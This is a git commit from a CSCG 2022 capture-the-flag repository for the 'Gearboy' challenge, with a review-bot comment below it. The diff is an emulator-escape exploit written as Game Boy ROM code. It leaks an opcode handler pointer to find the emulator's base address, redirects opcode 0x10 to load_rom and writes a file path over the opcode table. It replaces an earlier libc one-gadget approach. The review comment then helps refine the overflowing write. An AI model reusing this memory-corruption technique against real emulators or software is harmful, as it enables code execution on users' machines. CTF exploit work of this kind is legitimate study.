cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'

commit 3464878abafda13241f2eaed3db8bfd696ee4b67
parent 818a0be94c63c6ddfabe108ca49e2c26922fc130
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 26 May 2022 15:24:01 +0200

Attempt via load_rom - crashes

Diffstat:
Mmain.c | 37++++++++++++++++++++-----------------
1 file changed, 20 insertions(+), 17 deletions(-)

diff --git a/main.c b/main.c
@@ -1,31 +1,34 @@
 #include "stdint.h"
+#include "string.h"
 void main(void)
 {
- volatile static void *memory;
- volatile static void *processor;
+ volatile static uint8_t *processor;
  volatile static uint64_t op0x00;
- volatile static uint64_t libc;
- volatile static uint64_t onegadget;
- volatile static uint64_t ld_leak;
+ volatile static uint64_t base;
+ volatile static uint64_t load_rom;
- /* memory - wrambanks = 0x72840 */
+ /* processor - wrambanks = -0x126a0 */
- /* WRAM BANK = -73 */
- memory = (void*) 0xD7c0;
+ /* WRAM BANK = -0x13 */
+ processor = (void*) 0xD960;
- /* get leak from heap */
- ld_leak = *(uint64_t*)(memory + 0x30);
- libc = ld_leak + 0x127dff0;
- onegadget = libc + 0xe3afe;
+ /* leak opcode 0x00 to get base */
+ op0x00 = *(uint64_t*)processor;
+ base = op0x00 - 0x1d420;
+ load_rom = base + 0x34ad0;
- /* WRAM BANK -13 */
- *(uint8_t*)(memory + 0x7c) = 0xf3; /* LSB */
+ /* set opcode 0x10 to load_rom */
+ *(uint64_t*)(processor+0x10*0x10) = load_rom;
- //* ..with new bank, overwrite op 0x00 funcptr */
- processor = (void*) 0xD960;
- *(uint64_t*)(processor) = onegadget;
+ /* write /bin/sh to processor pointer (opcode 0x00) */
+ strcpy(processor, "/home/ctf/wrapper.py");
+
+ __asm \
+ stop \
+ halt \
+ __endasm;
  while (1);
 }
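Review bot: `strcpy(processor, "/home/ctf/wrapper.py")` passes a `volatile uint8_t *` where `strcpy` expects `char *`, so the qualifier and type are dropped silently, and the call writes 21 bytes (20 characters plus the terminator) starting at the opcode-0x00 slot; if the table stride is 16 bytes, as the `0x10*0x10` index two lines above suggests, that write runs into the following entry, which may be connected to the crash named in the commit message. The comment above it says `/bin/sh` while the literal is the wrapper path, so `/* write the wrapper path over the opcode 0x00 slot; 21 bytes incl. NUL */` would describe the line accurately. Spelling the length out, `memcpy((void *)processor, "/home/ctf/wrapper.py", sizeof "/home/ctf/wrapper.py");`, keeps the same bytes but makes the write extent visible at the call site. The `__asm ... __endasm` block and `void main(void)` are compiler extensions (presumably SDCC) and are worth a one-line comment saying so, since the file otherwise reads as portable C.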